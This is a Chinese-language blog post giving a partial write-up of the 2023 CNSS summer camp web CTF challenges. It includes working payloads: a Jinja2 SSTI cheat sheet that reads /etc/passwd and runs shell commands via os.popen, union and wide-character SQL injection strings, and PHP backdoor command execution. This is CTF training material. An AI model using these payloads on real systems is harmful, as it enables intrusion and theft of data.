

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#447EA5">
  <meta name="author" content="yfz-ikun604">
  <meta name="keywords" content="">
  
    <meta name="description" content="CNSS_WP(部分)">
<meta property="og:type" content="article">
<meta property="og:title" content="2023CNSS夏令营">
<meta property="og:url" content="http://ikun604.github.io/2023/09/28/CNSS_Summer_WP/index.html">
<meta property="og:site_name" content="一个真正的鳗">
<meta property="og:description" content="CNSS_WP(部分)">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-09-27T16:00:00.000Z">
<meta property="article:modified_time" content="2024-01-18T13:18:33.676Z">
<meta property="article:author" content="yfz-ikun604">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>2023CNSS夏令营 - 一个真正的鳗</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"ikun604.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://static.zkqiang.cn/example.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="2023CNSS夏令营"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-09-28 00:00" pubdate>
          2023年9月28日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          6.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          51 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">2023CNSS夏令营</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="CNSS"><a href="#CNSS" class="headerlink" title="CNSS"></a>CNSS</h1><h2 id="1-Baby-Signln"><a href="#1-Baby-Signln" class="headerlink" title="1.[Baby] Signln"></a>1.[Baby] Signln</h2><p>F12-&gt;去掉disabled</p>
<h2 id="2-Baby-Backdoor"><a href="#2-Baby-Backdoor" class="headerlink" title="2.[Baby] Backdoor"></a>2.[Baby] Backdoor</h2><p>解读php代码，发现要以POST的方式发送请求</p>
<p>步骤:</p>
<p>用hackbar发送请求，</p>
<p>先查看有哪些文件cnss&#x3D;system(“ls”);</p>
<p>然后cnss&#x3D;system(“cat 1.php”); 发现flag</p>
<p>最后cnss&#x3D;system(“cat &#x2F;flag”);</p>
<h2 id="3-Easy-Leak"><a href="#3-Easy-Leak" class="headerlink" title="3.[Easy] Leak"></a>3.[Easy] Leak</h2><p>首先涉及到vim泄露的问题，直接&#x2F;.index.php.swp</p>
<p>然后打开文件，发现以下</p>


<p>于是发出get请求</p>
<p>&#x2F;?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f&#x3D;system(“ls”);</p>
<p>发现只有index.php文件</p>
<p>于是&#x2F;?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f&#x3D;system(“ls ..&#x2F;..”);</p>
<p>发现以下文件</p>
<p>backups cache lib local lock log mail opt run spool tmp www </p>
<p>没有发现与flag相关的，于是继续，发现了</p>
<p>bin boot dev etc fl4444444g home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var </p>
<p>最后cat即可</p>
<p>?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f&#x3D;system(“cat ..&#x2F;..&#x2F;..&#x2F;fl4444444g”);</p>
<p>吐槽:</p>
<p>在做题时，我还尝试了find &#x2F; -name “flag*”命令，发现了一堆flags文件，但是找了很多，都是空白的，最后三个甚至还藏了一点东西，里面分别有0x9，0x1003,4655，尝试过把他们拼接作为答案，还尝试了十六进制转十进制，但是都没成功，最后不断的ls文件才发现真正的flag，有一说一，出题人是真的狗</p>
<h2 id="4-Baby-Webpack"><a href="#4-Baby-Webpack" class="headerlink" title="4.[Baby] Webpack"></a>4.[Baby] Webpack</h2><p>利用google的插件source detector下载.js.map文件，查看即可</p>
<h2 id="5-Easy-ezhttp"><a href="#5-Easy-ezhttp" class="headerlink" title="5.[Easy] ezhttp"></a>5.[Easy] ezhttp</h2><p>(有用的东西:<a target="_blank" rel="noopener" href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers">HTTP headers - HTTP | MDN (mozilla.org)</a>)</p>
<p>F12 ，发现只接受CNSS请求，于是bs抓包，将请求方式改为CNSS</p>
<p>response发现只接受安卓微信内置浏览器的请求</p>
<p>于是修改代理，网上可找到安卓微信内置浏览器的代理</p>
<p>进一步发现要要来自cnss.io的请求(Referer)</p>
<p>再进一步发现只接受本机请求(XFF):127.0.0.1</p>
<p>再再进一步发现只接受uestc.edu.cn域名的请求，改host，Host: uestc.edu.cn</p>
<p>再再再进一步发现只接受内容类型为application&#x2F;json的请求，Content-Type:application&#x2F;json</p>
<p>再再再再(恼)进一步发现不接受内容长度为0的请求，再上一步的时候，已经不为0了，值是299，</p>
<p>所以发过去的时候显示“你倒是发个json过来啊“,手动设置的话应该为</p>


<p>后面应该有个空行，不知道为什么，没有的话就不行</p>
<p>好，于是要发一个json过去</p>


<p>如图</p>


<p>接着消息是这个</p>




<p>接着是这个，“能在cookie中写入你的名字(name)吗？”</p>


<p>接着是这个，“能在Cookie中写入你的密码(password)吗？”</p>


<p>最后一个消息是“BasicAuth验证失败”</p>




<p>最后成功拿到flag</p>
<h2 id="6-Easy-ezunserialize"><a href="#6-Easy-ezunserialize" class="headerlink" title="6.[Easy] ezunserialize"></a>6.[Easy] ezunserialize</h2><p>拿到题，对题目进行分析，可得出要发送一个get请求，从而显示flag</p>
<p>直接就是一个序列化+绕过wakeup，发现不对</p>
<p>询问大神，在e神的指点下，发现源代码不对劲，要复制进vscode查看，</p>
<p>于是重新序列化并进行url编码，因为浏览器会将得到的get请求进行一次url解码，最后也是顺利拿到flag</p>


<h2 id="7-Easy-CNSS-Feedback-Pre-alpha"><a href="#7-Easy-CNSS-Feedback-Pre-alpha" class="headerlink" title="7.[Easy] CNSS Feedback Pre-alpha"></a>7.<strong>[Easy] CNSS Feedback Pre-alpha</strong></h2><p>来自e神的指点</p>


<p>SSTI注入</p>
<p>以下是一些SSTI基础</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">dict：保存类实例或对象实例的属性变量键值对字典<br><span class="hljs-keyword">class</span>：返回调用的参数类型<br><span class="hljs-symbol">mro</span>：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。<br><span class="hljs-symbol">bases</span>：返回类型列表<br><span class="hljs-symbol">subclasses</span>：返回<span class="hljs-symbol">object</span>的子类<br><span class="hljs-symbol">init</span>：类的初始化方法<br><span class="hljs-symbol">globals</span>：函数会以字典类型返回当前位置的全部全局变量 与 <span class="hljs-symbol">func_globals</span> 等价<br></code></pre></td></tr></table></figure>

<figure class="highlight ceylon"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs ceylon"><span class="hljs-comment">//获取对象类</span><br><span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-number">__</span><span class="hljs-keyword">class</span><span class="hljs-number">__</span>      	&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;str&#x27;</span>&gt;<br>().<span class="hljs-number">__</span><span class="hljs-keyword">class</span><span class="hljs-number">__</span>		&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;tuple&#x27;</span>&gt;<br>[].<span class="hljs-number">__</span><span class="hljs-keyword">class</span><span class="hljs-number">__</span>		&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;list&#x27;</span>&gt;<br> <span class="hljs-string">&quot;&quot;</span>.<span class="hljs-number">__</span><span class="hljs-keyword">class</span><span class="hljs-number">__</span>		&lt;<span class="hljs-keyword">class</span> <span class="hljs-string">&#x27;str&#x27;</span>&gt;<br> <br><span class="hljs-number">__</span> init<span class="hljs-number">__</span>方法用于将对象实例化，<br><span class="hljs-number">__</span> globals<span class="hljs-number">__</span>获取<span class="hljs-keyword">function</span>所处空间下可使用的<span class="hljs-keyword">module</span>、方法以及所有变量。<br><span class="hljs-number">__</span> <span class="hljs-keyword">import</span><span class="hljs-number">__</span>动态加载类和函数，也就是导入模块，经常用于导入os模块<br></code></pre></td></tr></table></figure>

<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sqf"><span class="hljs-comment">//基类</span><br>&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__base__</span>&#125;&#125;		(&lt;<span class="hljs-built_in">type</span> <span class="hljs-string">&#x27;basestring&#x27;</span>&gt;,)<br>类型对象的全部基类，以元组形式，类型的实例通常没有属性<br>&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__mro__</span>&#125;&#125; 此属性是由类组成的元组，在方法解析期间会基于它来查找基类<br> <br>[].<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__bases__</span>[<span class="hljs-number">0</span>]		&lt;<span class="hljs-built_in">type</span> <span class="hljs-string">&#x27;object&#x27;</span>&gt;<br></code></pre></td></tr></table></figure>

<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sqf"><span class="hljs-comment">//返回子类</span><br><span class="hljs-string">&quot;&quot;</span>.<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__bases__</span>[<span class="hljs-number">0</span>].<span class="hljs-variable">__subclasses__</span>()<br><span class="hljs-string">&quot;&quot;</span>.<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__mro__</span>[-<span class="hljs-number">1</span>].<span class="hljs-variable">__subclasses__</span>()<br>可以从返回的子类中找到可以利用的类<br></code></pre></td></tr></table></figure>

<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="language-xml">#文件读取和写入</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__</span>[0].__subclasses__()[59].__init__.__globals__.__builtins__[&#x27;open&#x27;](<span class="hljs-name">&#x27;/etc/passwd&#x27;</span>).read()&#125;&#125;</span><span class="language-xml">  </span><br><span class="language-xml"> </span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">&#x27;&#x27;.__class__.__mro__</span>[2].__subclasses__()[40](<span class="hljs-name">&#x27;/etc/passwd&#x27;</span>).read()&#125;&#125;</span><span class="language-xml">  </span><br><span class="language-xml"> </span><br><span class="language-xml">#每次执行都要先写然后编译执行</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">&#x27;&#x27;.__class__.__mro__</span>[2].__subclasses__()[40](<span class="hljs-name">&#x27;/tmp/owned.cfg&#x27;</span>,<span class="hljs-string">&#x27;w&#x27;</span>).write(<span class="hljs-name">&#x27;code&#x27;</span>)&#125;&#125;</span><span class="language-xml">  </span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123; <span class="hljs-name">config.from_pyfile</span>(<span class="hljs-name">&#x27;/tmp/owned.cfg&#x27;</span>) &#125;&#125;</span><span class="language-xml">  </span><br><span class="language-xml"> </span><br><span class="language-xml">#命令执行</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__</span>[0].__subclasses__()[59].__init__.__globals__.__builtins__[&#x27;eval&#x27;](<span class="hljs-name">&#x27;1+1&#x27;</span>)&#125;&#125;</span><span class="language-xml">  </span><br><span class="language-xml"> </span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__</span>[0].__subclasses__()[59].__init__.__globals__.__builtins__[&#x27;eval&#x27;](<span class="hljs-name">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"> </span><br><span class="language-xml">#这条指令可以注入，但是如果直接进入python2打这个poc，会报错，用下面这个就不会，可能是python启动会加载了某些模块</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__</span>[0].__subclasses__()[59].__init__.__globals__.__builtins__[&#x27;eval&#x27;](<span class="hljs-name">&quot;__import__(&#x27;os&#x27;).popen(&#x27;whoami&#x27;).read()&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"> </span><br><span class="language-xml">#system函数换为popen(&#x27;&#x27;).read()，需要导入os模块</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">&#x27;&#x27;.__class__.__mro__</span>[2].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](<span class="hljs-name">&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"> </span><br><span class="language-xml">#不需要导入os模块，直接从别的模块调用</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__</span>[0].__subclasses__()[71].__init__.__globals__[&#x27;os&#x27;].popen(<span class="hljs-name">&#x27;ls&#x27;</span>).read()&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="language-xml">#读文件</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__</span>[0].__subclasses__()[177].__init__.__globals__.__builtins__[&#x27;open&#x27;](<span class="hljs-name">&#x27;d://whale.txt&#x27;</span>).read()&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"> </span><br><span class="language-xml">#命令执行</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__bases__</span>[0].__subclasses__()[75].__init__.__globals__.__builtins__[&#x27;eval&#x27;](<span class="hljs-name">&quot;__import__(&#x27;os&#x27;).popen(&#x27;whoami&#x27;).read()&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"> </span><br><span class="language-xml">#命令执行（变种）</span><br><span class="language-xml">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="language-xml">	&#123;% if c.__name__==&#x27;catch_warnings&#x27; %&#125;	</span><br><span class="language-xml">    </span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">c.__init__.__globals__</span>[&#x27;__builtins__&#x27;].eval(<span class="hljs-name">&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;</span>) &#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml">&#123;% endif %&#125;</span><br><span class="language-xml">&#123;% endfor %&#125;</span><br><span class="language-xml"> </span><br><span class="language-xml">#读文件（变种）</span><br><span class="language-xml">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="language-xml">&#123;% if c.__name__==&#x27;catch_warnings&#x27; %&#125;</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123; <span class="hljs-name">c.__init__.__globals__</span>[&#x27;__builtins__&#x27;].open(<span class="hljs-name">&#x27;filename&#x27;</span>, <span class="hljs-string">&#x27;r&#x27;</span>).read() &#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml">&#123;% endif %&#125;</span><br><span class="language-xml">&#123;% endfor %&#125;</span><br></code></pre></td></tr></table></figure>

<p>最后题解是这样，获取基类，查看子类，找到os.wrap close这一个，初始化，使用函数，找到flag，读取flag</p>


<h2 id="8-Easy-CNSS-Database-1-0"><a href="#8-Easy-CNSS-Database-1-0" class="headerlink" title="8.[Easy] CNSS Database 1.0"></a>8.[Easy] CNSS Database 1.0</h2><p> 第一步，判断是数字型注入还是字符型注入</p>
<p>比较输入1和输入2-1的结果，不同则为字符型注入</p>
<p>本题目二者相同，故为数字型注入</p>
<p>直接union语句查看页面回显</p>
<p>当输入为</p>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-number">-1</span> <span class="hljs-built_in">union</span> <span class="hljs-built_in">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span><br></code></pre></td></tr></table></figure>

<p>时，页面回显不同</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">爆库,<span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">database</span>(),<span class="hljs-number">3</span><br>爆表,<span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,,group_concat(<span class="hljs-built_in">table_name</span>),<span class="hljs-number">3</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-keyword">database</span>()<br>爆字段 <span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> ,group_concat(<span class="hljs-built_in">column_name</span>),<span class="hljs-number">3</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">&#x27;cnss&#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-built_in">table_name</span>=<span class="hljs-string">&#x27;wh3re_1s_fl4g&#x27;</span><br>爆字段内容 <span class="hljs-number">-1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,group_concat(fulage),<span class="hljs-number">3</span> <span class="hljs-keyword">from</span> cnss.wh3re_1s_fl4g<br></code></pre></td></tr></table></figure>

<h2 id="9-Mid-CNSS-Database-2-0"><a href="#9-Mid-CNSS-Database-2-0" class="headerlink" title="9.[Mid] CNSS Database 2.0"></a>9.[Mid] CNSS Database 2.0</h2><p>使用fuzz模糊测试，intruder爆破发现是宽字符注入</p>
<p>单引号被转义，可使用%df绕过是，原理是在单或双引号前添加一个字符，使其和斜杠（\）组合被当作一个汉字，从而保留单或双引号，使其发挥应用的作用</p>
<p>·爆库<code>%df&#39; union select 1,database()#</code></p>
<p>·爆表<code>%df&#39; union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#</code></p>
<p>·爆column<code>%df&#39; union select 1,group_concat(colmun_name) from information_schema.columns where table_schema=database() and where table_name=表名的十六进制形式</code></p>
<p>·最后爆字段，获得flag</p>
<p>附个不懂原理的方法:–’ union select 1,database()#,后面方法相同</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF-WP/" class="category-chain-item">CTF_WP</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>2023CNSS夏令营</div>
      <div>http://ikun604.github.io/2023/09/28/CNSS_Summer_WP/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>yfz-ikun604</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年9月28日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/09/29/NewStarCTF_web_WP/" title="2023NewStarCTF">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">2023NewStarCTF</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/09/28/AuroraWP/" title="AuroraCTF">
                        <span class="hidden-mobile">AuroraCTF</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <div>ikun604的博客|记录成长的过程</div>  
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
